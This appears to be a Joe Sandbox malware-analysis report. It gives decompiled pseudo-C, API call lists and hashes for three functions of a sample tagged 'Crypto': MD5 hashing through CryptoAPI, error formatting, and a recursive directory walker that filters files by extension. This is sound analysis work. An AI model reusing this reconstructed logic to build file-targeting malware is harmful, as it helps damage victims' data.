Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00410FC0(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				int _v48;
				char _v52;
				char _v56;
				char _v68;
				void* __ebx;
				void* __edi;
				long** _t40;
				int* _t41;
				int _t42;
				char _t44;
				char _t50;
				void* _t72;
				CHAR** _t73;
				void* _t80;
				int _t81;
				void* _t83;
				CHAR* _t84;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t92;
				void* _t93;

				_t79 = __edx;
				 *[fs:0x0] = _t89;
				_t90 = _t89 - 0x34;
				_v20 = _t90;
				_t40 =  &_v32;
				_t73 = __edx;
				_v32 = 0;
				_t84 = __ecx;
				_v28 = 0;
				_v36 = 0;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff);
				if(_t40 == 0) {
					_v40 = _t40;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t41 =  &_v28;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
				if(_t41 == 0) {
					_v44 = _t41;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t42 = lstrlenA(_t84);
				__imp__CryptHashData(_v28, _t84, _t42, 0);
				if(_t42 == 0) {
					_v48 = _t42;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t85 = __imp__CryptGetHashParam;
				_v24 = 0;
				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
				_t98 = _t44;
				if(_t44 == 0) {
					_v52 = _t44;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
				_v36 = _t81;
				E0042B420(_t81, 0, _v24 + 1);
				_t92 = _t90 + 0x10;
				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
				if(_t50 == 0) {
					_v56 = _t50;
					E00430ECA( &_v56, 0x5085b8);
				}
				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
				E0042B420(_t52, 0, 0x14 + _v24 * 2);
				_t87 = 0;
				_t93 = _t92 + 0x10;
				if(_v24 > 0) {
					do {
						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
						_t93 = _t93 + 0xc;
						lstrcatA( *_t73,  &_v68);
						_t87 = _t87 + 1;
					} while (_t87 < _v24);
				}
				E00422110(_t81);
				__imp__CryptDestroyHash(_v28);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
			}

0x00410fc0
0x00410fd1
0x00410fd8
0x00410fde
0x00410fe1
0x00410ff0
0x00410ff2
0x00410ff9
0x00410ffb
0x00411002
0x00411009
0x00411010
0x00411018
0x0041101a
0x00411026
0x00411026
0x0041102b
0x0041103b
0x00411043
0x00411045
0x00411051
0x00411051
0x00411059
0x00411064
0x0041106c
0x0041106e
0x0041107a
0x0041107a
0x0041107f
0x00411092
0x00411099
0x0041109b
0x0041109d
0x0041109f
0x004110ab
0x004110ab
0x004110c1
0x004110c3
0x004110ca
0x004110cf
0x004110de
0x004110e2
0x004110e4
0x004110f0
0x004110f0
0x00411109
0x0041110b
0x00411110
0x00411112
0x00411118
0x00411120
0x0041112e
0x00411133
0x0041113c
0x00411142
0x00411143
0x00411120
0x00411149
0x00411154
0x0041115f
0x0041116a
0x00411177

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95
stringmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411900(WCHAR* __ecx, long __edx, WCHAR* _a4) {
				short _v8;
				WCHAR* _v12;
				short _v2060;
				int _t15;
				long _t36;
				void* _t44;
				WCHAR* _t48;

				_t36 = __edx;
				_v12 = __ecx;
				if(__edx == 0) {
					_t36 = GetLastError();
				}
				FormatMessageW(0x1300, 0, _t36, 0x400,  &_v8, 0, 0);
				_t15 = lstrlenW(_v8);
				_t44 = LocalAlloc(0x40, 0x50 + (_t15 + lstrlenW(_v12)) * 2);
				lstrcpyW(_t44, _v12);
				lstrcatW(_t44, L" failed with error ");
				E00412AC0(_t36,  &_v2060);
				lstrcatW(_t44,  &_v2060);
				lstrcatW(_t44, L": ");
				lstrcatW(_t44, _v8);
				_t48 = _a4;
				if(_t48 == 0) {
					MessageBoxW(0, _t44, 0, 0);
				} else {
					if(lstrlenW(_t44) < 0x400) {
						lstrcpynW(_t48, _t44, 0x400);
						E00412BA0(_t48);
					} else {
						E0042B420(_t48, 0, 0x800);
						E0042D8D0(_t48, _t44, 0x7fe);
						E00412BA0(_t48);
					}
				}
				LocalFree(_v8);
				return LocalFree(_t44);
			}

0x0041190a
0x0041190c
0x00411913
0x0041191b
0x0041191b
0x00411932
0x00411941
0x0041195f
0x00411962
0x00411974
0x0041197e
0x0041198b
0x00411993
0x00411999
0x0041199b
0x004119a0
0x004119f2
0x004119a2
0x004119ae
0x004119dc
0x004119e4
0x004119b0
0x004119b8
0x004119c4
0x004119ce
0x004119ce
0x004119ae
0x00411a01
0x00411a0c

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32 ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				intOrPtr _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				WCHAR* _v92;
				short _v104;
				signed int _v108;
				signed int _v112;
				char _v128;
				signed int _v132;
				signed int _v136;
				short _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				short _v180;
				intOrPtr _v184;
				char _v204;
				struct _WIN32_FIND_DATAW _v796;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t305;
				intOrPtr _t315;
				WCHAR* _t322;
				void* _t323;
				void* _t326;
				signed int _t330;
				signed int _t331;
				int _t333;
				signed int _t335;
				signed int _t336;
				intOrPtr _t340;
				intOrPtr _t346;
				intOrPtr* _t348;
				void* _t349;
				void* _t352;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t356;
				void* _t357;
				void* _t374;
				signed int _t380;
				WCHAR* _t381;
				WCHAR* _t392;
				WCHAR* _t394;
				void* _t451;
				void* _t457;
				signed int _t458;
				signed int _t460;
				WCHAR* _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				void* _t464;
				intOrPtr* _t467;
				signed int _t469;
				intOrPtr* _t472;
				signed int _t474;
				char* _t481;
				char* _t482;
				intOrPtr* _t484;
				signed int _t486;
				intOrPtr* _t488;
				short* _t494;
				signed int _t497;
				signed int _t500;
				WCHAR* _t501;
				short* _t502;
				signed int _t507;
				intOrPtr* _t515;
				void* _t517;
				void* _t518;
				void* _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				signed int _t528;
				WCHAR* _t529;
				intOrPtr _t531;
				void* _t537;
				signed int* _t538;
				void* _t540;
				intOrPtr* _t541;
				intOrPtr* _t542;
				WCHAR* _t543;
				short _t544;
				intOrPtr _t545;
				void* _t546;
				void* _t547;
				short* _t549;
				void* _t550;
				short* _t551;

				_push(0xffffffff);
				_push(0x4cab09);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t545;
				_t546 = _t545 - 0x30c;
				_t456 = __edx;
				_v56 = __ecx;
				_v24 = __edx;
				_v8 = 0;
				E00411AB0();
				_t528 = 0;
				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v52 = _t537;
				if(_t537 == 0) {
					L15:
					_v108 = 7;
					_v112 = 0;
					_v128 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_push(0);
					_v64 = 0;
					_v80 = 0;
					_v60 = 7;
					E00414690(_t456,  &_v80,  &_a4);
					_v8 = 4;
					_t457 = PathFindFileNameW;
					_t302 =  >=  ? _v80 :  &_v80;
					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
					_v132 = 7;
					_v136 = 0;
					_v152 = 0;
					if( *_t515 != 0) {
						_t467 = _t515;
						_t77 = _t467 + 2; // 0x2
						_t537 = _t77;
						do {
							_t305 =  *_t467;
							_t467 = _t467 + 2;
						} while (_t305 != 0);
						_t469 = _t467 - _t537 >> 1;
						goto L24;
					} else {
						_t469 = 0;
						L24:
						_push(_t469);
						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
						_v8 = 5;
						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
						if( &_v80 != _t538) {
							if(_v60 >= 8) {
								L00422587(_v80);
								_t546 = _t546 + 4;
							}
							_v60 = 7;
							_v64 = 0;
							_v80 = 0;
							if(_t538[5] >= 8) {
								_v80 =  *_t538;
								 *_t538 = 0;
							} else {
								_t430 = _t538[4] + 1;
								if(_t538[4] + 1 != 0) {
									E004205A0( &_v80, _t538, _t430 + _t430);
									_t546 = _t546 + 0xc;
								}
							}
							_v64 = _t538[4];
							_v60 = _t538[5];
							_t538[5] = 7;
							_t538[4] = 0;
							 *_t538 = 0;
						}
						if(_v28 >= 8) {
							L00422587(_v48);
							_t546 = _t546 + 4;
						}
						_t529 = 0;
						while(_v64 != 0 || _v136 != 0) {
							_t529 =  &(_t529[0]);
							_t313 =  >=  ? _v80 :  &_v80;
							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
							if( *_t515 != 0) {
								_t472 = _t515;
								_t107 = _t472 + 2; // 0x2
								_t538 = _t107;
								do {
									_t315 =  *_t472;
									_t472 = _t472 + 2;
								} while (_t315 != 0);
								_t474 = _t472 - _t538 >> 1;
								L42:
								_push(_t474);
								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
								if( &_v80 != _t538) {
									if(_v60 >= 8) {
										L00422587(_v80);
										_t546 = _t546 + 4;
									}
									_v60 = 7;
									_v64 = 0;
									_v80 = 0;
									if(_t538[5] >= 8) {
										_v80 =  *_t538;
										 *_t538 = 0;
									} else {
										_t418 = _t538[4] + 1;
										if(_t538[4] + 1 != 0) {
											E004205A0( &_v80, _t538, _t418 + _t418);
											_t546 = _t546 + 0xc;
										}
									}
									_v64 = _t538[4];
									_v60 = _t538[5];
									_t538[5] = 7;
									_t538[4] = 0;
									 *_t538 = 0;
								}
								if(_v28 >= 8) {
									L00422587(_v48);
									_t546 = _t546 + 4;
								}
								continue;
							}
							_t474 = 0;
							goto L42;
						}
						if(_t529 > 3) {
							L73:
							_t322 = E00417140( &_v104,  &_a4, "*");
							_t547 = _t546 + 4;
							if(_t322[0xa] >= 8) {
								_t322 =  *_t322;
							}
							_t323 = FindFirstFileW(_t322,  &_v796);
							_v52 = _t323;
							if(_v84 >= 8) {
								L00422587(_v104);
								_t323 = _v52;
								_t547 = _t547 + 4;
							}
							_v84 = 7;
							_t458 = 0;
							_v88 = 0;
							_v104 = 0;
							_v24 = 0;
							if(_t323 == 0xffffffff) {
								L139:
								if(_v132 >= 8) {
									L00422587(_v152);
									_t547 = _t547 + 4;
								}
								_v132 = 7;
								_v136 = 0;
								_v152 = 0;
								if(_v60 >= 8) {
									L00422587(_v80);
									_t547 = _t547 + 4;
								}
								_v60 = 7;
								_v64 = 0;
								_v80 = 0;
								if(_v108 >= 8) {
									L00422587(_v128);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v108 = 7;
								_v112 = 0;
								_v128 = 0;
								goto L146;
							} else {
								_t540 = _v52;
								do {
									_t481 = ".";
									_t330 =  &(_v796.cFileName);
									while(1) {
										_t517 =  *_t330;
										if(_t517 !=  *_t481) {
											break;
										}
										if(_t517 == 0) {
											L84:
											_t331 = 0;
											L86:
											if(_t331 == 0) {
												goto L137;
											}
											_t482 = L"..";
											_t335 =  &(_v796.cFileName);
											while(1) {
												_t518 =  *_t335;
												if(_t518 !=  *_t482) {
													break;
												}
												if(_t518 == 0) {
													L92:
													_t336 = 0;
													L94:
													if(_t336 == 0) {
														goto L137;
													}
													if((_v796.dwFileAttributes & 0x00000010) == 0) {
														_t460 = _t458 + 1;
														_v24 = _t460;
														if(_t460 >= 0x400) {
															_v24 = 0;
															E00411AB0();
														}
														if(_a32 == 0) {
															goto L137;
														} else {
															_v28 = 7;
															_push(0xffffffff);
															_push(0);
															_v48 = 0;
															_v32 = 0;
															E00414690(_t460,  &_v48,  &_a4);
															_v8 = 9;
															if(_v796.cFileName != 0) {
																_t484 =  &(_v796.cFileName);
																_t241 = _t484 + 2; // 0x2
																_t519 = _t241;
																do {
																	_t340 =  *_t484;
																	_t484 = _t484 + 2;
																} while (_t340 != 0);
																_t486 = _t484 - _t519 >> 1;
																L108:
																_push(_t486);
																_t487 =  &_v48;
																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
																_t344 =  >=  ? _v48 :  &_v48;
																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
																_v17 = 0;
																_t346 = _v56;
																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
																_t531 =  *((intOrPtr*)(_t346 + 0x890));
																if(_t541 == _t531) {
																	L118:
																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
																	_t529 =  *(_t346 + 0x89c);
																	if(_t542 == _t529) {
																		L126:
																		if(_v17 == 0) {
																			_t348 = _t346 + 0x868;
																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
																				_t348 =  *_t348;
																			}
																			_push(_t461);
																			_push(_t348);
																			_t349 = E00421C02(_t487);
																			_t547 = _t547 + 8;
																			if(_t349 == 0) {
																				_t462 = _v56;
																				_t488 = _t462 + 0x820;
																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
																					_t488 =  *_t488;
																				}
																				_push(_t488);
																				_t351 =  >=  ? _v48 :  &_v48;
																				_push( >=  ? _v48 :  &_v48);
																				_t352 = E00421C02(_t488);
																				_t547 = _t547 + 8;
																				if(_t352 == 0) {
																					_t521 =  >=  ? _v48 :  &_v48;
																					E004111C0(_t462,  >=  ? _v48 :  &_v48);
																				}
																			}
																		}
																		L134:
																		_v8 = 5;
																		if(_v28 >= 8) {
																			L00422587(_v48);
																			_t547 = _t547 + 4;
																		}
																		_t540 = _v52;
																		goto L137;
																	}
																	L120:
																	L120:
																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
																		_t354 = _t542;
																	} else {
																		_t354 =  *_t542;
																	}
																	_t487 =  &(_v796.cFileName);
																	_push( &(_v796.cFileName));
																	_push(_t354);
																	_t355 = E00421C02( &(_v796.cFileName));
																	_t547 = _t547 + 8;
																	if(_t355 != 0) {
																		goto L134;
																	}
																	_t542 = _t542 + 0x18;
																	if(_t542 != _t529) {
																		goto L120;
																	}
																	_t346 = _v56;
																	goto L126;
																}
																L110:
																L110:
																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
																	_t356 = _t541;
																} else {
																	_t356 =  *_t541;
																}
																_push(_t461);
																_push(_t356);
																_t357 = E00421C02(_t487);
																_t547 = _t547 + 8;
																if(_t357 != 0) {
																	goto L116;
																}
																_t541 = _t541 + 0x18;
																if(_t541 != _t531) {
																	goto L110;
																}
																L117:
																_t346 = _v56;
																goto L118;
																L116:
																_v17 = 1;
																goto L117;
															}
															_t486 = 0;
															goto L108;
														}
													}
													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
													_t547 = _t547 + 4;
													_push(1);
													_v8 = 7;
													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													_push(0xffffffff);
													_push(0);
													_v8 = 8;
													E00414690(_t458,  &_v180,  &_v204);
													_v156 = 0;
													E00413B70(_a28,  &_v180);
													if(_v160 >= 8) {
														L00422587(_v180);
														_t547 = _t547 + 4;
													}
													_v8 = 5;
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													if(_v184 >= 8) {
														L00422587(_v204);
														_t547 = _t547 + 4;
													}
													goto L137;
												}
												_t523 =  *((intOrPtr*)(_t335 + 2));
												_t204 =  &(_t482[2]); // 0x2e
												if(_t523 !=  *_t204) {
													break;
												}
												_t335 = _t335 + 4;
												_t482 =  &(_t482[4]);
												if(_t523 != 0) {
													continue;
												}
												goto L92;
											}
											asm("sbb eax, eax");
											_t336 = _t335 | 0x00000001;
											goto L94;
										}
										_t524 =  *((intOrPtr*)(_t330 + 2));
										_t201 =  &(_t481[2]); // 0x2e0000
										if(_t524 !=  *_t201) {
											break;
										}
										_t330 = _t330 + 4;
										_t481 =  &(_t481[4]);
										if(_t524 != 0) {
											continue;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t331 = _t330 | 0x00000001;
									goto L86;
									L137:
									_t333 = FindNextFileW(_t540,  &_v796);
									_t458 = _v24;
								} while (_t333 != 0);
								FindClose(_t540);
								goto L139;
							}
						}
						_t549 = _t546 - 0x18;
						_t494 = _t549;
						_push(0xffffffff);
						 *(_t494 + 0x14) = 7;
						 *(_t494 + 0x10) = 0;
						_push(0);
						 *_t494 = 0;
						E00414690(_t457, _t494,  &_a4);
						_t374 = E0040F310(_t529, _t538);
						_t546 = _t549 + 0x18;
						if(_t374 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						_push(0);
						E00414690(_t457,  &_v128,  &_a4);
						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
						_v8 = 6;
						_t497 = 0;
						_t380 = _v112;
						_t543 = _v92;
						if(_t380 == 0) {
							L57:
							_t463 = _v56;
							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
							_t381 = _t463 + 0x820;
							if(_t381[0xa] >= 8) {
								_t381 =  *_t381;
							}
							PathAppendW(_t543, _t381);
							_push(_v24);
							_v28 = 7;
							_v32 = 0;
							_v48 = 0;
							E00418400( &_v48, _t543, _v88);
							if(_v108 >= 8) {
								L00422587(_v128);
								_t546 = _t546 + 4;
							}
							_t500 = _v28;
							_v108 = 7;
							_v112 = 0;
							_v128 = 0;
							if(_t500 >= 8) {
								_v128 = _v48;
							} else {
								_t402 = _v32 + 1;
								if(_v32 + 1 != 0) {
									E004205A0( &_v128,  &_v48, _t402 + _t402);
									_t500 = _v28;
									_t546 = _t546 + 0xc;
								}
							}
							_v112 = _v32;
							_t389 =  >=  ? _v128 :  &_v128;
							_v108 = _t500;
							if(PathFileExistsW( >=  ? _v128 :  &_v128) == 0) {
								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00);
								_t501 = _t463 + 0x838;
								_t550 = _t546 + 4;
								_t529 = _t392;
								if(_t501[0xa] >= 8) {
									_t501 =  *_t501;
								}
								lstrcpyW(_t529, _t501);
								_t394 = _t463 + 0x850;
								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
									_t394 =  *_t394;
								}
								lstrcatW(_t529, _t394);
								_t551 = _t550 - 0x18;
								_t502 = _t551;
								_push(0xffffffff);
								 *(_t502 + 0x14) = 7;
								 *(_t502 + 0x10) = 0;
								_push(0);
								 *_t502 = 0;
								E00414690(_t463, _t502,  &_v128);
								E0040F0E0(_t529);
								E00420BED(_t529);
								_t546 = _t551 + 0x1c;
							}
							_v8 = 5;
							if(_t543 != 0) {
								L00422587(_t543);
								_t546 = _t546 + 4;
							}
							goto L73;
						}
						do {
							_t409 =  >=  ? _v128 :  &_v128;
							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
							_t497 = _t497 + 1;
							_t380 = _v112;
						} while (_t497 < _t380);
						goto L57;
					}
				} else {
					_t464 = 0;
					do {
						_v28 = 7;
						_push(0xffffffff);
						_push(0);
						_v48 = 0;
						_v32 = 0;
						E00414690(_t464,  &_v48,  &_a4);
						_v8 = 1;
						_push(0xffffffff);
						_push(0);
						_v104 = 0;
						_v84 = 7;
						_v88 = 0;
						E00414690(_t464,  &_v104,  *_v24 + _t464);
						_v8 = 2;
						_t525 = _v32;
						if(_t525 <= 1) {
							L10:
							if(_v84 >= 8) {
								L00422587(_v104);
								_t546 = _t546 + 4;
							}
							_v84 = 7;
							_v8 = 0;
							_v88 = 0;
							_v104 = 0;
							if(_v28 >= 8) {
								L00422587(_v48);
								_t546 = _t546 + 4;
							}
							goto L14;
						}
						_t507 = _v88;
						if(_t507 <= 1) {
							goto L10;
						} else {
							_t446 =  >=  ? _v48 :  &_v48;
							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
								_t507 = _v88;
							}
							_t544 = _v104;
							_t448 =  >=  ? _t544 :  &_v104;
							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
								_t544 = _v104;
							}
							_t509 =  >=  ? _t544 :  &_v104;
							_t450 =  >=  ? _v48 :  &_v48;
							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
							_t547 = _t546 + 8;
							if(_t451 == 0) {
								if(_v84 >= 8) {
									L00422587(_v104);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v84 = 7;
								_v88 = 0;
								_v104 = 0;
								if(_v28 >= 8) {
									_t326 = L00422587(_v48);
									_t547 = _t547 + 4;
								}
								L146:
								if(_a24 >= 8) {
									_t326 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t326;
							} else {
								_t537 = _v52;
								goto L10;
							}
						}
						L14:
						_t528 = _t528 + 1;
						_t464 = _t464 + 0x18;
					} while (_t528 < _t537);
					goto L15;
				}
			}

0x0040f733
0x0040f735
0x0040f740
0x0040f741
0x0040f748
0x0040f750
0x0040f752
0x0040f756
0x0040f759
0x0040f760
0x0040f76f
0x0040f77e
0x0040f780
0x0040f783
0x0040f8b5
0x0040f8b7
0x0040f8be
0x0040f8c5
0x0040f8c9
0x0040f8d0
0x0040f8d2
0x0040f8d3
0x0040f8d6
0x0040f8de
0x0040f8e5
0x0040f8ea
0x0040f8f5
0x0040f8fb
0x0040f902
0x0040f904
0x0040f90d
0x0040f917
0x0040f921
0x0040f966
0x0040f968
0x0040f968
0x0040f970
0x0040f970
0x0040f973
0x0040f976
0x0040f97d
0x00000000
0x0040f923
0x0040f923
0x0040f97f
0x0040f97f
0x0040f987
0x0040f98c
0x0040f9a8
0x0040f9af
0x0040f9b5
0x0040f9ba
0x0040f9bf
0x0040f9bf
0x0040f9c4
0x0040f9cb
0x0040f9d2
0x0040f9da
0x0040f9f6
0x0040f9f9
0x0040f9dc
0x0040f9df
0x0040f9e0
0x0040f9ea
0x0040f9ef
0x0040f9ef
0x0040f9e0
0x0040fa02
0x0040fa08
0x0040fa0d
0x0040fa14
0x0040fa1b
0x0040fa1b
0x0040fa22
0x0040fa27
0x0040fa2c
0x0040fa2c
0x0040fa2f
0x0040fa31
0x0040fa44
0x0040fa4c
0x0040fa53
0x0040fa59
0x0040fa5f
0x0040fa61
0x0040fa61
0x0040fa64
0x0040fa64
0x0040fa67
0x0040fa6a
0x0040fa71
0x0040fa73
0x0040fa73
0x0040fa7b
0x0040fa98
0x0040fa9f
0x0040faa5
0x0040faaa
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fabb
0x0040fac2
0x0040faca
0x0040fae6
0x0040fae9
0x0040facc
0x0040facf
0x0040fad0
0x0040fada
0x0040fadf
0x0040fadf
0x0040fad0
0x0040faf2
0x0040faf8
0x0040fafd
0x0040fb04
0x0040fb0b
0x0040fb0b
0x0040fb12
0x0040fb1b
0x0040fb20
0x0040fb20
0x00000000
0x0040fb12
0x0040fa5b
0x00000000
0x0040fa5b
0x0040fb2b
0x0040fcf0
0x0040fcfb
0x0040fd00
0x0040fd07
0x0040fd09
0x0040fd09
0x0040fd13
0x0040fd1d
0x0040fd20
0x0040fd25
0x0040fd2a
0x0040fd2d
0x0040fd2d
0x0040fd32
0x0040fd39
0x0040fd3b
0x0040fd42
0x0040fd46
0x0040fd4c
0x00410072
0x00410076
0x0041007e
0x00410083
0x00410083
0x00410088
0x00410093
0x0041009d
0x004100a4
0x004100a9
0x004100ae
0x004100ae
0x004100b3
0x004100be
0x004100c5
0x004100c9
0x004100ce
0x004100d3
0x004100d3
0x004100d6
0x004100d8
0x004100df
0x004100e6
0x00000000
0x0040fd52
0x0040fd52
